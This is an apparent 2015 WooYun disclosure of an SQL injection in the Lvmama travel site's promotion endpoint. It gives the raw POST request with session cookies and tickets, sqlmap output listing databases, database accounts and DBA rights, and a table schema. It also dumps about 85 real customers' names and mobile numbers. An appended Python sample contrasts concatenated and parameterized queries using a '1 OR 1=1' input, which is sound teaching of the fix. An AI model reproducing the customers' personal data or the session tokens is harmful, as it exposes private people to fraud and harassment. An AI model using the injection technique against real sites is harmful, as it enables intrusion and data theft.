
Vulnerability summary

Defect ID: wooyun-2015-0149508

Title: Lvmama Travel (驴妈妈旅游网) SQL injection vulnerability (involving 400,000 users' information, including emails and mobile numbers)

Vendor: 驴妈妈旅游网 (Lvmama Travel)

Author: Xmyth_Xi2oMin9

Submitted: 2015-10-26 11:47

Fixed: 2015-12-10 14:58

Published: 2015-12-10 14:58

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-26: details sent to the vendor, awaiting vendor handling
2015-10-26: vendor confirmed; details visible to the vendor only
2015-11-05: details opened to core white hats and experts in related fields
2015-11-15: details opened to regular white hats
2015-11-25: details opened to intern white hats
2015-12-10: details opened to the public

Brief description:

Lvmama Travel was founded in 2008 and is a new-style B2C travel e-commerce site in China, a platform for booking self-guided travel products and for travel information. From the outset Lvmama positioned itself in the market as a self-guided travel service provider; over several years it has developed a business built around , while also covering package-style bus self-drive tours, long-haul tours, outbound tours and other online travel services, giving travellers one-stop convenience.

Detailed description:

POST /zt/promo/jingpai/ HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.lvmama.com/zt/promo/jingpai/?losc=018454
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.lvmama.com
Content-Length: 22
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: uid=wKgKcFYog5wUhDoMAwSLAg==; lvsessionid=6bae512d-cab8-44b0-8484-dbf3dc91a2f7_19599120; PHPSESSID=8jeoh55slod7o2kdjqapfg3ke7; cmTPSet=Y;
CoreID6=80631807383514455029084&ci=90409730; JSESSIONID=D5BFF75625F84EBBE7EBC2BFDA40E347; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ;
ip_location=114.252.84.34; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; bdshare_firstime=1445503292281;
Rvyz72RO3yiChuCn=Nd7JknIMvMbwmiaxz91Y1fgy%2BofrdUg5iPag4kOzZdjK64Ach%2FkRy8ak7RlN7fbxI9hNU5V%2Bpo25jKklYvylU9ctWR%2F2gu0Szk6XN2ibMagh9k1kWIp28sgmU6mHWraMxXqg%2FGgUW17nleI1cK9I
%2Foeo0hG3UbsB4IcQZ%2BgZVrCP1DksKEqcVdc1Zg0IKCypFEvlHUhVvQKBRY3XVkFIiotfIFb%2FyxkR1RiuImfCtOuEm%2Bco1NUKix2pJ4J45kk7wt5aGVy2dGoAzR
%2F0VapeEsWFSqIHK4JxrvcIw9jKzIM28E57GpoVKovg0WY1pgPs2bsIVPmlw9P%2FZniVorYY%2BaGeW3BmiWnOOnooCM6W4VsmxUHOt4YQ7HDotUE9kIdyq%2FiAUCniceuIcDb0s%2F1MHjIElt7%2FPJjGYxDn6H4ZuRsd
%2B0%2FCZ4%2FwVq5LhubjFQxuNs%2FAudtMhIm0t5%2FCMx6C0g%3D%3D147184d890600e57142c00419dd6d3b8fb734b5c;
Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1445503759,1445503760,1445503762,1445503780; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1445503780; _gscu_1059159971=45503269im498j16;
_gscs_1059159971=455032692ykal116|pv:14; _gscbrs_1059159971=1; CNZZDATA5199293=cnzz_eid%3D146445622-1445503813-%26ntime%3D1445503813; __utmt=1; _lvTrack_UUID=0BBAB92F-E147-
4DFA-995F-4A47F94DA774; _lvTrack_sessionID=DFB3BACB-A4A2-4325-BD2A-E2E9F8ED65C7; 90409730_clogin=v=1&l=1445502908&e=1445506446307; bfd_s=30114658.29133386.1445502959660;
tmc=19.30114658.23722909.1445502959661.1445504673964.1445504675949; tma=30114658.77050305.1445495717462.1445495717462.1445495717462.1; tmd=21.30114658.77050305.1445495717462.;
Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445495717; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445504680; bfd_g=a7fcd4ae5266aa7700004f9a00003c4b562883a2;
__xsptplus443=443.2.1445502958.1445504695.9%233%7C%20http%3A%2F%2Fworldcup.lvmama.com%2F%7C%7C%7C%7C%23%23RSaZsYr184i7YqTumvZYCkmKHh5evnOM%23;
__utma=30114658.629155318.1445503956.1445503956.1445503956.1; __utmb=30114658.27.10.1445503956; __utmc=30114658; __utmz=30114658.1445503956.1.1.utmcsr=(direct)|utmccn=
(direct)|utmcmd=(none); CASTGC=TGC-4894-9cPH1OpoQvrcbEXxkS8XlUUpRwPbuhFFichqGwy2Oqbewl5CeM; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b;
unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; ticket=ST-6718-yWol7IXNAaaSHPbWfnNL; bqeRoYZ7gjxuUl7T=hc9vwzkfrdgsYDymMaiPiQctebJZNegXeCFaJD
%2FVQvZtsP6M5N2Iqs2S9Treo7wvs8EHIjqpMydw1lAw9JSsfuPguLC0Qxp285oJFGb7WZsCh3YoBFnI8YwRP%2FdpJTAOBo2lQBV3fAbJ6ayATnWl1s5wplyPxRJJQ1fn0RbgFn8x0iI5kx3KP5XqaiXU%2BmYLDs
%2BdZWJNNQfn1RJK022w13Jit8oTdYNJpkX8uhRZ
%2Bs2tKdLd1tSamC3AYVrozJlzYy35arQryczKP9xZUwckwXIIRcK9QXJst50CFKr7n4Vk6LjPyX5qSwbzNJoPv3UGBq5OgxC7OfCC4tP55JkvUvi5%2FVWQs2bs6rbUFVuKaOWqtAsx
%2B2cVDab6voEkET4Bf4kEOEqIHCWGQy2YH0dNg3ISjl%2BD20F9XjhEDrozWM4v2PBeGxkS7P4cqYfWLjyUQLNOP4JxUEXaydcct9ixsQ%3D%3D9b93b499da7723026d731c4e157b02851f6358dd
action=ajaxRecord&pid=1

(screenshot: 1.png)

Proof of vulnerability:

available databases [18]:
[*] info
[*] infonews
[*] information_schema
[*] lmm_core
[*] lmm_customization
[*] lmm_guide
[*] lmm_logs
[*] lmm_lvyou
[*] lmm_message
[*] lmm_module
[*] lmm_subject
[*] lmm_subjects2
[*] lmm_weather
[*] lvmamabus
[*] minisite
[*] mysql
[*] others
[*] post_robot


Users:

database management system users [51]:
[*] 'activity'@'192.168.10.%'
[*] 'bi'@'192.168.10.77'
[*] 'bi_guide'@'192.168.10.%'
[*] 'bi_lvyou'@'192.168.10.%'
[*] 'bi_trip'@'192.168.10.%'
[*] 'customization'@'192.168.10.%'
[*] 'customization'@'192.168.30.%'
[*] 'gonglue'@'192.168.10.%'
[*] 'guide2'@'192.168.10.%'
[*] 'info'@'192.168.10.%'
[*] 'infonews'@'192.168.10.%'
[*] 'intelligence'@'%'
[*] 'lmm_core'@'192.168.10.%'
[*] 'lmm_core'@'192.168.30.%'
[*] 'lmm_core'@'192.168.30.0\\/24'
[*] 'lmm_guide'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.30.%'
[*] 'lmm_message'@'192.168.10.%'
[*] 'lmm_message'@'192.168.30.%'
[*] 'lmm_module'@'192.168.10.%'
[*] 'lmm_module'@'192.168.30.%'
[*] 'lmm_subject'@'192.168.10.%'
[*] 'lmm_subject'@'192.168.30.%'
[*] 'lmm_subjects'@'192.168.10.%'
[*] 'lmm_trip'@'192.168.10.55'
[*] 'lmm_trip'@'192.168.30.%'
[*] 'lmm_weather'@'192.168.10.%'
[*] 'lmm_weather'@'192.168.30.%'
[*] 'lv_bbs_x2'@'192.168.10.%'
[*] 'lv_bbs_x2'@'192.168.10.16'
[*] 'lv_ospeed_admin'@'192.168.10.%'
[*] 'lv_oth1058_admin'@'192.168.10.58'
[*] 'lv_others_admin'@'192.168.10.%'
[*] 'lv_others_admin'@'192.168.10.16'
[*] 'lv_spdbank_admin'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.30.%'
[*] 'lvmama_lvyou'@'192.168.50.%'
[*] 'lvmamabus'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.30.%'
[*] 'lvmamainfo'@'192.168.10.%'
[*] 'minisite'@'192.168.10.%'
[*] 'ndouser'@'192.168.10.%'
[*] 'repl'@'%'
[*] 'root'@'%'
[*] 'root'@'192.168.10.%'
[*] 'root'@'192.168.20.%'
[*] 'root'@'localhost'
[*] 'suipian'@'192.168.10.%'


current user is DBA:    True


(screenshot: 1.png)


Listing only a subset; there are many more.

| \\u6797\\u71d5\\u73b2 | [email protected] | 18824876464 |
| \\u6c64\\u745e\\u519b | [email protected] | 18685034481 |
| \\u8881\\u840c\\u840c | [email protected] | 18773158473 |
| \\u8d21\\u5a77\\u5a77 | [email protected] | 13357399729 |
| \\u9a6c\\u6625\\u4e3d | [email protected] | 15166998827 |
| \\u949f\\u6d2a\\u4e91 | [email protected] | 18850251809 |
| \\u7f57\\u7476 | [email protected] | 13590985099 |
| \\u738b\\u6587\\u5f81 | [email protected] | 15083218171 |
| \\u5468\\u8587 | [email protected] | 13775136536 |
| \\u5f90\\u82b3 | [email protected] | 13677012150 |
| \\u51cc\\u7f8e\\u5a1c | [email protected] | 13562917517 |
| \\u4e8e\\u4e3d\\u5a1f | [email protected] | 13764940215 |
| \\u738b\\u4f73\\u96ef | [email protected] | 13918907903 |
| \\u5e2d\\u5a77 | [email protected] | 18679400560 |
| \\u6c5f\\u529b | [email protected] | 13879826561 |
| \\u6731\\u4e9a\\u5a1f | [email protected] | 15515195572 |
| \\u9648\\u5c11\\u6e05 | [email protected] | 13590658929 |
| \\u8f9c\\u8bd7\\u60c5 | [email protected] | 18673637725 |
| \\u8463\\u4e39 | [email protected] | 13951672988 |
| \\u6881\\u82b8 | [email protected] | 15050523259 |
| \\u5f20\\u536b\\u82ac | [email protected] | 13588336030 |
| \\u5434\\u654f\\u541b | [email protected] | 13917539124 |
| \\u9648\\u71d5\\u59ae | [email protected] | 13534335511 |
| \\u590f\\u76fc\\u76fc | [email protected] | 18768145389 |
| \\u6797\\u59d7\\u59d7 | [email protected] | 13542586180 |
| \\u5434\\u5b59\\u4e50 | [email protected]qq.com | 18249941158 |
| \\u989c\\u52e4\\u5029 | [email protected] | 13566688226 |
| \\u6768\\u7a57\\u5a77 | [email protected] | 13824765996 |
| \\u5411\\u96ef\\u96ef | [email protected] | 13628205955 |
| \\u9648\\u8679 | [email protected] | 18645559168 |
| \\u9648\\u5ada\\u59ae | [email protected] | 13708738667 |
| \\u9ec4\\u8273 | [email protected] | 13638567969 |
| \\u5434\\u96ea | [email protected] | 13858960416 |
| \\u5468\\u73fa | [email protected] | 13636564969 |
| \\u90d1\\u96ea | [email protected] | 15983790901 |
| \\u4e01\\u679c | [email protected] | 15575300887 |
| \\u90d1\\u656c | [email protected] | 18681680885 |
| \\u9648\\u96ea\\u4e39 | [email protected] | 13631033410 |
| \\u59dc\\u5b81 | [email protected] | 13577002456 |
| \\u738b\\u6653\\u71d5 | [email protected] | 15080011292 |
| \\u4e8e\\u6db5 | [email protected] | 18353123458 |
| \\u674e\\u5a1c | [email protected] | 13077387452 |
| \\u738b\\u7f8e\\u840d | [email protected] | 13656562643 |
| \\u51af\\u96e8\\u66e6 | [email protected] | 15106823857 |
| \\u9b4f\\u79cb\\u51e4 | [email protected] | 18354230627 |
| \\u5362\\u71d5\\u73b2 | [email protected] | 13580923988 |
| \\u8463\\u7131 | [email protected] | 13913184385 |
| \\u77f3\\u521a | [email protected] | 13973684362 |
| \\u738b\\u680c\\u7fca | [email protected] | 15858156533 |
| \\u8bb8\\u8d1e\\u59ae | [email protected] | 13652323463 |
| \\u848b\\u6167\\u654f | [email protected] | 18662065004 |
| \\u6c64\\u4e00\\u654f | [email protected] | 18858132501 |
| \\u5415\\u6653\\u590f | [email protected] | 15807711853 |
| \\u738b\\u83b9 | [email protected] | 13858865688 |
| \\u502a\\u660e | [email protected] | 13951235229 |
| \\u8521\\u67f3\\u5a77 | [email protected] | 13580359390 |
| \\u5f90\\u8d85 | [email protected] | 13482429267 |
| \\u53f6\\u5029 | [email protected] | 13773042868 |
| \\u676d\\u5251\\u9f99 | [email protected] | 15895553057 |
| \\u5de8\\u664b\\u71d5 | [email protected] | 13818121277 |
| \\u738b\\u971e | [email protected] | 13627655306 |
| \\u8c22\\u4e5d\\u6885 | [email protected] | 15062777505 |
| \\u5b81\\u6b23 | [email protected] | 15275599575 |
| \\u674e\\u8389\\u4e39 | [email protected] | 13838292533 |
| \\u5b81\\u6b23\\u60a6 | [email protected] | 18716339043 |
| \\u4e54\\u78ca | [email protected] | 13292055522 |
| \\u4e50\\u5a9b | [email protected] | 13811271619 |
| \\u7f57\\u6728\\u6f7a | [email protected] | 18998500129 |
| \\u5434\\u660e\\u73e0 | [email protected] | 15160050876 |
| \\u674e\\u96ea | [email protected] | 18282050280 |
| \\u51b7\\u5b9c\\u6625 | [email protected] | 13917662850 |
| \\u8096\\u4e39 | [email protected] | 18744523981 |
| \\u738b\\u7490 | [email protected] | 13750830150 |
| \\u6c5f\\u4e9a\\u9a8f | [email protected] | 18673446284 |
| \\u5468\\u826f\\u666f | [email protected] | 15980384361 |
| \\u675c\\u6d0b | [email protected] | 18744006450 |
| \\u5f90\\u8000 | [email protected] | 13764463540 |
| \\u8521\\u8212\\u73b2 | [email protected] | 15059597008 |
| \\u90d1\\u91cd | [email protected] | 18675747775 |
| \\u6768\\u4e1d\\u96c1 | [email protected] | 18929088605 |
| \\u90b5\\u6960 | [email protected] | 18254591870 |
| \\u9648\\u6dd1\\u745c | [email protected] | 13450642111 |
| \\u9ec4\\u7af9 | [email protected] | 18978639325 |
| \\u656c\\u5c0f\\u6885 | [email protected] | 15216658470 |
| \\u5f20\\u6db5\\u5a67 | [email protected] | 13568357591 |


Database: others
Table: yx_users
[7 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| create_time | int(11)          |
| email       | varchar(128)     |
| id          | int(10) unsigned |
| lvmama_code | varchar(16)      |
| mobile      | varchar(16)      |
| yx_code     | varchar(16)      |
| yx_key      | varchar(8)       |
+-------------+------------------+


(screenshot: 1.png)

Remediation:

I hope the reviewers will appropriately mask some of the information after the vendor confirms. Thanks for your work.
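The remediation section above does not describe a code-level fix, so the following is an added example (not the vendor's code and not the report author's) of the defect class the request above exhibits: a request parameter such as pid pasted into the SQL text, shown beside a hardened handler that checks the expected type and binds the value as a query parameter. The table and column names (promo_record, pid, name, bids), the sample rows and the SQLite backend are assumptions for the example; the page only shows the request body action=ajaxRecord&pid=1 and sqlmap's output. Parameterization closes the injection itself; the "current user is DBA: True" line in the proof section is a separate least-privilege problem that this example does not address.

```python
import sqlite3

# Constructed sample data standing in for the endpoint's backing table.
# Table and column names are assumptions for this example, not from the page.
SAMPLE_ROWS = [
    (1, "promo-1", 12),
    (2, "promo-2", 7),
    (3, "promo-3", 3),
]


def build_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE promo_record (pid INTEGER PRIMARY KEY, name TEXT, bids INTEGER)"
    )
    conn.executemany("INSERT INTO promo_record VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def record_vulnerable(conn: sqlite3.Connection, pid: str) -> list:
    """Anti-pattern: the raw request parameter becomes part of the SQL text,
    so the database parses whatever the client sent as SQL."""
    sql = f"SELECT pid, name, bids FROM promo_record WHERE pid = {pid}"
    return conn.execute(sql).fetchall()


def record_hardened(conn: sqlite3.Connection, pid: str) -> list:
    """Hardened form: reject anything that is not the expected integer,
    then bind the value as a parameter so it is never parsed as SQL."""
    if not pid.isdigit():
        raise ValueError("pid must be a non-negative integer")
    sql = "SELECT pid, name, bids FROM promo_record WHERE pid = ?"
    return conn.execute(sql, (int(pid),)).fetchall()


def compare(pid: str) -> dict:
    """Run one input through both handlers and report the row count each
    returns; None means the hardened handler rejected the input."""
    conn = build_db()
    vulnerable_rows = len(record_vulnerable(conn, pid))
    try:
        hardened_rows = len(record_hardened(conn, pid))
    except ValueError:
        hardened_rows = None
    conn.close()
    return {"vulnerable": vulnerable_rows, "hardened": hardened_rows}


if __name__ == "__main__":
    # A well-formed id: both handlers return the single matching row.
    print(compare("1"))
    # The textbook tautology: the concatenating handler returns every row,
    # the hardened handler refuses the input before it reaches the database.
    print(compare("1 OR 1=1"))
```

The type check on its own is not the defence; binding the value with `?` is. The check exists so that malformed input is rejected at the application boundary with a clear error rather than silently coerced, which is also the point at which such requests should be logged.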

Copyright notice: please credit the source when reposting: Xmyth_Xi2oMin9@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-10-26 14:57

Vendor reply:

thx

Latest status:

None yet